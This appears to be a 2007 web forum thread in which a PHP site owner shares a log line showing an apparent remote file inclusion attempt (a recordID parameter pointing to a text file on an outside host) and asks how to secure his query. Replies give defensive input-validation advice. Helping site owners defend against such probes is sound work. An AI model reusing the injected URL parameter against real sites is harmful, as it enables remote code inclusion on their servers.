Help to prevent hacking that happened today

dcjones

Hi all.

I need some advise with an issue that happened today and was reported to me by my hosting company who have threatened to close me down.

I have a site which has a MySQL database for its record source.

On the site visitor can perford searches and this I think is where the problem is:

Looking at the web logs I have found the following:

++++++++++++++++++++++++++++++++++++++++++++++++++
142.162.221.55 - - [06/Dec/2007:00:30:56 +0100] "GET /catalogue/record_detail.php?recordID=http://a-malicious-website.com/html/body.txt? HTTP/1.1" 200 204 mydomain.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "-"
++++++++++++++++++++++++++++++++++++++++++++++++++

As you can see whoever/whatever has attached "?recordID=http://xoxoxoxox.h17.ru/html/body.txt?" to the end of the GET request.

Can anyone tell me how this happens and how to prevent it.
What is this type of hacking called.
Is the query below secure.

The query that uses /catalogue/record_detail.php?recordID= is:

$colname_DetailRS1 = "-1";
if (isset($_GET['ID'])) {
  $colname_DetailRS1 = (get_magic_quotes_gpc()) ? $_GET['ID'] : addslashes($_GET['ID']);
}
mysql_select_db($database_chandos, $Chandos);
$query_DetailRS1 = sprintf("SELECT * FROM chandos_books WHERE ID = %s", GetSQLValueString($colname_DetailRS1, "int"));
$DetailRS1 = mysql_query($query_DetailRS1, $Chandos) or die(mysql_error());
$row_DetailRS1 = mysql_fetch_assoc($DetailRS1);
$totalRows_DetailRS1 = mysql_num_rows($DetailRS1);

NogDog

It's easy to do. You can do it by just typing that URL into the address bar on your browser, though a serious hacker would probably be using some program to send the HTTP requests, such as with a PHP script using cURL functions. Basically, you need to realize that all external inputs can be faked, and done so quite easily by any hacker with half a brain.

You can prevent it from doing anything by filtering/validating any values you use from $GET, $POST, $COOKIE, or $REQUEST. In this situation, presumably $_GET['ID'] should be of a particular format and of some minimum and maximum length. You should validate it, and reject it if it is not within those parameters.

bradgrafelman

An example of validating ID in this case would be to cast it to integer (since ID is presumably a numeric column).

Also note that addslashes() shouldn't be used to sanitize data for SQL queries; instead, you should use a function such as [man]mysql_real_escape_string/man or, even better, use the PDO extension which automatically sanitizes data for you.